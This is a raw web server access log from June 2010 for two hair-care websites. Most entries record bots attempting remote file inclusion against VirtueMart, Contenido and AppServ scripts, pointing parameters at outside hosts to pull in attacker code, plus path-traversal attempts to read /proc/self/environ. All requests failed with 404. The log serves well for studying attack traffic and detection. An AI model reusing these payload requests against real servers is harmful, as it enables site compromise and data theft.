174.121.237.135 - - [13/Jun/2010:20:52:35 -0700] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:20:53:09 -0700] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:20:53:11 -0700] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
194.186.220.52 - - [13/Jun/2010:20:53:41 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.center-prestige.ru/catalogue/preview/?section=199&page=2&sort=2" "Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320)" "growlonghairfast.com"
194.186.220.52 - - [13/Jun/2010:20:53:42 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320)" "growlonghairfast.com"
204.232.202.236 - - [13/Jun/2010:20:53:56 -0700] "GET /logs/access_091207.log//index2.php?option=com_virtuemart&page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
204.232.202.236 - - [13/Jun/2010:20:53:56 -0700] "GET /index2.php?option=com_virtuemart&page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
204.232.202.236 - - [13/Jun/2010:20:53:56 -0700] "GET /logs//index2.php?option=com_virtuemart&page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
91.201.66.76 - - [13/Jun/2010:20:57:08 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative)" "www.freehairsecrets.com"
91.201.66.76 - - [13/Jun/2010:20:57:08 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative)" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:20:57:35 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:20:57:45 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:20:58:25 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.152.220.245 - - [13/Jun/2010:21:02:08 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:07:28 -0700] "GET /logs/access_100201.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:07:28 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:07:29 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
92.103.254.153 - - [13/Jun/2010:21:14:24 -0700] "GET /index.php?DOCUMENT_ROOT=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.99 - - [13/Jun/2010:21:14:24 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.60 - - [13/Jun/2010:21:14:24 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.63 - - [13/Jun/2010:21:14:24 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.122 - - [13/Jun/2010:21:14:56 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:15:40 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:21:15:40 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:21:15:40 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:21:15:43 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:15:43 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:15:43 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:16:46 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:16:46 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:16:46 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.21.247.137 - - [13/Jun/2010:21:18:03 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
59.21.247.137 - - [13/Jun/2010:21:18:04 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
114.108.151.149 - - [13/Jun/2010:21:18:05 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
92.103.254.153 - - [13/Jun/2010:21:18:09 -0700] "GET /index.php?DOCUMENT_ROOT=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.99 - - [13/Jun/2010:21:18:12 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.60 - - [13/Jun/2010:21:18:18 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.63 - - [13/Jun/2010:21:18:18 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:21:18:27 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:18:27 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:18:27 -0700] "GET /logs/access_100208.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.93.240.122 - - [13/Jun/2010:21:18:31 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:21:18:43 -0700] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [13/Jun/2010:21:18:53 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:19:17 -0700] "GET /logs/access_100118.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:19:44 -0700] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:20:32 -0700] "GET /logs/access_100412.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.93.240.63 - - [13/Jun/2010:21:21:08 -0700] "GET /logs/access_100412.log//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.63 - - [13/Jun/2010:21:21:08 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.63 - - [13/Jun/2010:21:21:08 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.122 - - [13/Jun/2010:21:21:23 -0700] "GET /logs/access_100412.log//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.122 - - [13/Jun/2010:21:21:23 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.122 - - [13/Jun/2010:21:21:23 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.99 - - [13/Jun/2010:21:21:34 -0700] "GET /logs/access_100412.log//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.99 - - [13/Jun/2010:21:21:35 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.99 - - [13/Jun/2010:21:21:35 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:21:43 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:21:21:43 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:21:21:43 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.93.240.60 - - [13/Jun/2010:21:22:00 -0700] "GET /logs/access_100412.log//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.60 - - [13/Jun/2010:21:22:00 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.60 - - [13/Jun/2010:21:22:00 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
92.103.254.153 - - [13/Jun/2010:21:22:03 -0700] "GET /logs/access_100412.log//index.php?DOCUMENT_ROOT=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
92.103.254.153 - - [13/Jun/2010:21:22:03 -0700] "GET /index.php?DOCUMENT_ROOT=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
92.103.254.153 - - [13/Jun/2010:21:22:03 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.99 - - [13/Jun/2010:21:23:13 -0700] "GET /logs/access_100412.log//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.99 - - [13/Jun/2010:21:23:13 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.99 - - [13/Jun/2010:21:23:13 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
59.21.247.137 - - [13/Jun/2010:21:23:20 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
59.21.247.137 - - [13/Jun/2010:21:23:23 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
114.108.151.149 - - [13/Jun/2010:21:23:34 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.122 - - [13/Jun/2010:21:23:51 -0700] "GET /logs/access_100412.log//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.122 - - [13/Jun/2010:21:23:51 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.122 - - [13/Jun/2010:21:23:51 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.60 - - [13/Jun/2010:21:24:06 -0700] "GET /logs/access_100412.log//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.60 - - [13/Jun/2010:21:24:06 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.60 - - [13/Jun/2010:21:24:06 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
92.103.254.153 - - [13/Jun/2010:21:24:11 -0700] "GET /logs/access_100412.log//index.php?DOCUMENT_ROOT=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
92.103.254.153 - - [13/Jun/2010:21:24:11 -0700] "GET /index.php?DOCUMENT_ROOT=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
92.103.254.153 - - [13/Jun/2010:21:24:11 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [13/Jun/2010:21:24:20 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.93.240.63 - - [13/Jun/2010:21:24:33 -0700] "GET /logs/access_100412.log//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.63 - - [13/Jun/2010:21:24:33 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.63 - - [13/Jun/2010:21:24:33 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [13/Jun/2010:21:28:44 -0700] "GET /logs/access_100412.log//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [13/Jun/2010:21:28:45 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [13/Jun/2010:21:28:46 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [13/Jun/2010:21:28:57 -0700] "GET /logs/access_100412.log//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [13/Jun/2010:21:29:03 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [13/Jun/2010:21:29:08 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
218.38.243.71 - - [13/Jun/2010:21:32:03 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_images_imgtag.php?mosConfig.absolute.path=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.243.71 - - [13/Jun/2010:21:32:03 -0700] "GET /components/com_virtuemart/show_images_imgtag.php?mosConfig.absolute.path=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.243.71 - - [13/Jun/2010:21:32:03 -0700] "GET /logs//components/com_virtuemart/show_images_imgtag.php?mosConfig.absolute.path=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [13/Jun/2010:21:35:17 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.privateinterlude.com//forum/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [13/Jun/2010:21:35:17 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.privateinterlude.com//forum/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [13/Jun/2010:21:35:18 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.privateinterlude.com//forum/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.37.143.198 - - [13/Jun/2010:21:36:42 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
125.141.91.138 - - [13/Jun/2010:21:36:42 -0700] "GET /logs/access_100412.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.privateinterlude.com//forum/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [13/Jun/2010:21:38:39 -0700] "GET /logs/access_100419.log%20%20//appserv/main.php/?appserv_root=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [13/Jun/2010:21:38:39 -0700] "GET /appserv/main.php/?appserv_root=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [13/Jun/2010:21:38:39 -0700] "GET /logs//appserv/main.php/?appserv_root=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:39:10 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:39:10 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:39:10 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:39:16 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:21:39:16 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:21:39:16 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.93.240.122 - - [13/Jun/2010:21:39:23 -0700] "GET /logs/access_100125.log//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.99 - - [13/Jun/2010:21:39:31 -0700] "GET /logs/access_100125.log//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.60 - - [13/Jun/2010:21:39:41 -0700] "GET /logs/access_100125.log//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:21:40:10 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.93.240.63 - - [13/Jun/2010:21:41:08 -0700] "GET /logs/access_100125.log//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
125.141.91.138 - - [13/Jun/2010:21:41:28 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.privateinterlude.com//forum/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [13/Jun/2010:21:41:48 -0700] "GET /logs/access_100412.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.privateinterlude.com//forum/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [13/Jun/2010:21:41:49 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.privateinterlude.com//forum/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [13/Jun/2010:21:41:49 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.privateinterlude.com//forum/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [13/Jun/2010:21:41:49 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.privateinterlude.com//forum/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
92.103.254.153 - - [13/Jun/2010:21:43:33 -0700] "GET /logs/access_100125.log//index.php?DOCUMENT_ROOT=http://v14ch.fileave.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.99 - - [13/Jun/2010:21:45:11 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
